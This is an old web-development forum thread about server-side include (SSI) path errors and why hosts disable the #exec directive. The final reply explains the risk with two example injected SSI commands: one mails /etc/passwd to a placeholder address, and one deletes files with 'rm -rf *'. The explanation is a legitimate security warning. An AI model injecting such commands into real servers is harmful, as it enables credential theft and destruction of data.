SitePoint Sponsor |
|
User Tag List
Results 1 to 8 of 8
Thread: SSI calls trouble
-
Aug 28, 2000, 21:14 #1
- Join Date
- May 2000
- Posts
- 229
- Mentioned
- 0 Post(s)
- Tagged
- 0 Thread(s)
I created a folder in my root directory and named it "ssi"
When i call my ssi file i call it like so:
Code:<!--#include file="ssi/file_name.html" -->
I get this:
"[an error occurred while processing this directive]"
Ive tried placing a "/" in front of the "ssi/file_name.html" with no luck
the only way i have been successful is by placing a "ssi" folder copy into all the subdirectories... I know there must be a better way. someone please help me
thank you so much
-
Aug 28, 2000, 21:38 #2
-
Aug 28, 2000, 22:41 #3
- Join Date
- May 2000
- Posts
- 229
- Mentioned
- 0 Post(s)
- Tagged
- 0 Thread(s)
great!
thank you very much luke
-
Aug 29, 2000, 01:28 #4
- Join Date
- Jun 2000
- Location
- Netherlands
- Posts
- 1,356
- Mentioned
- 0 Post(s)
- Tagged
- 0 Thread(s)
Could anyone tell me when you use 'file' in a SSI tag?
www.nyanko.ws - My web-, software- and game development company.
www.mayaposch.com - My personal site and blog.
-
Aug 29, 2000, 10:12 #5
-
Aug 29, 2000, 10:55 #6
- Join Date
- Jun 2000
- Location
- Netherlands
- Posts
- 1,356
- Mentioned
- 0 Post(s)
- Tagged
- 0 Thread(s)
Ok, thanks, Wayne
www.nyanko.ws - My web-, software- and game development company.
www.mayaposch.com - My personal site and blog.
-
Aug 29, 2000, 15:56 #7
- Join Date
- Aug 2000
- Location
- Silicon Valley
- Posts
- 2,241
- Mentioned
- 0 Post(s)
- Tagged
- 0 Thread(s)
Lately, my host told me that because of security reason, they don't allow <!--#exec cgi... and replace by <!--#include virtual=...
Could anybody tell me what problem could happen with exec cgi? and what the different with include virtual!- Son Nguyen
AdSpeed.com - Ad Serving and Ad Management Made Easy
-
Aug 29, 2000, 18:55 #8
Many hosts don't support the #exec in SSI for security reasons.
EG: <!--#exec cmd="/bin/cat /etc/passwd | mail you@host.com"--> would mail the password file to you@host.com and depending on the server setup malicious users could insert that command, or any other command into a form and break into a system or cause other damage like deleting files. ( <!--#exec cmd="/bin/rm -rf *"--> )
Bookmarks